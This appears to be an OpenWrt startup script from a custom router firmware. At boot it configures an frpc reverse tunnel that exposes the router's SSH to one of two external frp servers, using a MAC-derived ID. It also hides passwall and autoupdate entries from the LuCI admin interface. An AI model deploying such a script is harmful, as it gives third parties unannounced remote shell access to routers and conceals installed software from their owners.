#!/bin/sh /etc/rc.common

START=99

start() {
    sleep 10
    
    frpnum=$(echo "$(ifconfig br-lan | grep "HWaddr" | awk '{print $5}')" | tr 'A-Z' 'a-z' | tr -d ":")
    uci set frpc.ssh.name=$frpnum
    uci set frpc.ssh.subdomain=$frpnum
    uci commit frpc
        
    if ping -c 3 -W 5 frp.201088.xyz >/dev/null 2>&1; then
        uci set frpc.common.server_addr='frp.201088.xyz'
        uci set frpc.ssh.remote_port='63080'
        uci commit frpc
        /etc/init.d/frpc restart
        logger "FRP service started with ID: $frpnum (201088 reachable)"
    else
    if ping -c 3 -W 5 frp.618212.xyz >/dev/null 2>&1; then
        uci set frpc.common.server_addr='frp.618212.xyz'
        uci set frpc.ssh.remote_port='80'
        uci commit frpc
        /etc/init.d/frpc restart
        logger "FRP service started with ID: $frpnum (618212 reachable)"
    else
        /etc/init.d/frpc stop
        logger "FRP service stopped due to network unreachable"
        fi
    fi
    
    rm -rf /etc/config/passwall_show
    rm -rf /etc/config/autoupdate_show
    uci set passwall.@global[0].hide_from_luci=1
    uci commit passwall
    /etc/init.d/uhttpd restart >/dev/null 2>&1
}